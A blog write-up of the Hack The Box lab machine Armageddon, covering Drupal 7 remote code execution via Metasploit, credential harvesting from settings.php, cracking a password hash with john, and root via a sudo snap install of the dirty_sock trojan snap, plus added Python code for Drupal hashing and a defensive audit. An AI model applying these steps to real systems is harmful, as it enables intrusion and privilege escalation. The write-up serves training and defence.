Armageddon From Hack The Box


 

Hello everyone, welcome to my second blog. In this blog I'm gonna show you how to get root on the Armageddon machine, an easy machine from Hack The Box created by Bertolis.

Let's begin.

Let's start with an nmap scan.


So there are only 2 ports open:

1) 22 : SSH

2) 80 : HTTP

Since we have an open HTTP port, let's add the target machine to our /etc/hosts file and start enumerating.

After a lot of enumeration on the website I got nothing, so I used Wappalyzer to identify the web server and the CMS this website is using, including its version. The CMS and its version can also be found in the page source.

This website is using Drupal CMS version 7.


Now that we know the Drupal version, let's look for known vulnerabilities.

After some time looking for exploits on Google I finally found the correct exploit on Rapid7. And yes, we will be doing this machine using Metasploit. Later I will post how to do this machine without Metasploit.

 

Let's fire up our msfconsole and get our low privilege shell.



Let's set LHOST and RHOST and run the exploit.

 

LHOST is the attacker machine's (your machine's) IP address and RHOST is the victim machine's (the Armageddon machine's) IP address. After setting LHOST and RHOST, run the exploit to get our shell.


And boom, we got our shell. Now let's enumerate from this shell. It is not a fully interactive shell, and we can't change directory to /home to list the users. After some time looking at each and every file and directory under /var/www/html, I found the MySQL username and password in /var/www/html/sites/default/settings.php.


 

MYSQL credentials:

Username : drupaluser

Password : CQHEy@9M*m23gBVj

Let's log in to MySQL using the above creds.

The problem is that the mysql client shows an error when we log in interactively with the username and password (our shell has no proper TTY), so we need to pass our queries to mysql from the command line to see what is inside the database.

Let's go back to the shell and run the commands below to get the password hash for the second user.


So we have 5 databases. Let's see what tables are in the drupal database.


There is a users table in the drupal database, so let's get the password hashes from it.


We have found a password hash for the brucetherealadmin user. Let's use john to crack the hash.

Command : john <hash-file> -w=/usr/share/wordlists/rockyou.txt

Now we have the password for the brucetherealadmin user.

Credentials : 

Username : brucetherealadmin

Password : booboo
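To make clear what john is actually testing here, this is the Drupal 7 password scheme written out in Python as an added example for this post (a port of the logic in Drupal's password.inc, not code from the original writeup): a $S$ marker, one cost character, an 8-character salt, then a SHA-512 chain of 2^cost rounds encoded with phpass's alphabet and truncated to 55 characters. The salts and costs used below are constructed; the point is that at the default cost each guess costs only 32768 SHA-512 rounds, so a weak password like booboo offers no real resistance to a wordlist.

```python
import hashlib

# phpass-style alphabet Drupal 7 uses for the cost character, the salt and the
# encoded digest (this is not standard base64).
ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
HASH_LENGTH = 55   # Drupal truncates the stored hash to this many characters

def _encode64(data: bytes) -> str:
    """Port of Drupal's _password_base64_encode(): 3 bytes -> 4 chars, low bits first."""
    out, i, n = [], 0, len(data)
    while i < n:
        value = data[i]
        i += 1
        out.append(ITOA64[value & 0x3F])
        if i < n:
            value |= data[i] << 8
        out.append(ITOA64[(value >> 6) & 0x3F])
        if i >= n:
            break
        i += 1
        if i < n:
            value |= data[i] << 16
        out.append(ITOA64[(value >> 12) & 0x3F])
        if i >= n:
            break
        i += 1
        out.append(ITOA64[(value >> 18) & 0x3F])
    return "".join(out)

def drupal7_hash(password: str, salt: str, count_log2: int = 15) -> str:
    """'$S$' + cost char + 8-char salt + encoded SHA-512 chain, cut to 55 chars."""
    pw = password.encode()
    digest = hashlib.sha512(salt.encode() + pw).digest()
    for _ in range(1 << count_log2):      # default cost 15 -> 32768 rounds
        digest = hashlib.sha512(digest + pw).digest()
    setting = "$S$" + ITOA64[count_log2] + salt
    return (setting + _encode64(digest))[:HASH_LENGTH]

def drupal7_verify(password: str, stored: str) -> bool:
    """The check Drupal runs at login; a cracker repeats it once per wordlist entry."""
    if len(stored) != HASH_LENGTH or not stored.startswith("$S$") or stored[3] not in ITOA64:
        return False
    count_log2 = ITOA64.index(stored[3])
    if not 7 <= count_log2 <= 30:          # Drupal rejects costs outside this range
        return False
    return drupal7_hash(password, stored[4:12], count_log2) == stored
```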

Now let's SSH in using these credentials.


We are now the brucetherealadmin user.

Get the user.txt flag from the /home/brucetherealadmin directory.

Now the privilege escalation part:

Let's list what this user can run with sudo.

Command : sudo -l

brucetherealadmin can install snaps using sudo.

Let's google whether snap can be used for privilege escalation.

I found some resources on Google which helped me with the privilege escalation.

1) Snap Exploit

2) Privilege Escalation using snap

The 2nd link helps more with understanding privilege escalation using snap, and the 1st link helps with exploiting it.

The Python script was not working, but after some time I figured it out. We just need to copy the trojan snap from the exploit, which is base64 encoded, decode it and save it as <file-name>.snap. Once that is done we can install our snap file and get a root shell.



Decode the snap file into the /tmp directory on the victim machine.

Once the snap file is created, run the following command.

Command : sudo /usr/bin/snap install --devmode <filename>.snap (in my case I named the file lol.snap)

Once the dirty_sock snap is installed, it creates a dirty_sock user with root privileges.

Let's su to the dirty_sock user.

And there we go, we are root now.

You can get root.txt from the /root directory.

The privilege escalation part was not as easy as it looks, but the machine is awesome and I learnt many new things. Great job by Bertolis.

Note: If you can't su to the dirty_sock user, try resetting the machine.
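For defenders, the useful takeaway from this box is what the trojan snap leaves behind: a new account with a full sudoers entry, a new member of the sudo group, and a snap installed in devmode, all enabled by a sudo rule that lets an ordinary user run snap install. The audit below is an added example for this post (not from the original writeup or from the dirty_sock project); it runs over constructed sample copies of /etc/sudoers, /etc/group and `snap list` output, with root assumed to be the only expected admin, and flags each of those traces.

```python
import re

# Constructed sample host state (not taken from the real machine) modelling what
# the trojan snap from this writeup leaves behind: a new sudoers entry, a new
# member of the sudo group, and a snap installed with --devmode.
SUDOERS = """root    ALL=(ALL:ALL) ALL
%sudo   ALL=(ALL:ALL) ALL
brucetherealadmin ALL=(root) NOPASSWD: /usr/bin/snap install *
dirty_sock    ALL=(ALL:ALL) ALL
"""
GROUP = "root:x:0:\nsudo:x:27:dirty_sock\nbrucetherealadmin:x:1000:\n"
SNAP_LIST = """Name        Version  Rev   Tracking  Publisher   Notes
core        16-2.45  9289  stable    canonical*  core
dirty-sock  0.1      x1    -         -           devmode
"""
KNOWN_ADMINS = {"root"}  # assumption: only root is expected to hold full sudo

# host=(runas) [TAG:]... commands  -> capture the command list
SUDO_RULE = re.compile(r"\S+\s*=\s*(?:\([^)]*\))?\s*(?:\w+:\s*)*(.*)")

def audit(sudoers=SUDOERS, group=GROUP, snap_list=SNAP_LIST, known=KNOWN_ADMINS):
    """Return a list of findings; an empty list means nothing suspicious."""
    findings = []
    for line in sudoers.splitlines():
        line = line.split("#", 1)[0].strip()
        if not line or line.startswith(("Defaults", "%")):
            continue                  # group rules are covered by the /etc/group check
        user, rule = line.split(None, 1)
        m = SUDO_RULE.match(rule)
        cmds = m.group(1).strip() if m else rule
        if cmds == "ALL" and user not in known:
            findings.append(f"sudoers: {user} has unrestricted sudo")
        if "snap install" in cmds:
            findings.append(f"sudoers: {user} may run snap install; install hooks run as root")
    for line in group.splitlines():
        name, _, _, members = line.split(":")
        for member in filter(None, members.split(",")):
            if name in ("sudo", "wheel") and member not in known:
                findings.append(f"group: {member} was added to {name}")
    for line in snap_list.splitlines()[1:]:      # skip the header row
        fields = line.split()
        if len(fields) == 6 and "devmode" in fields[5].split(","):
            findings.append(f"snap: {fields[0]} is installed in devmode (unconfined)")
    return findings
```

On a live host, feed it the real files and the output of `snap list`; the sudo rule finding is the one to fix first, since it is what turned a shell as brucetherealadmin into root.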

Thank you for reading my blog.
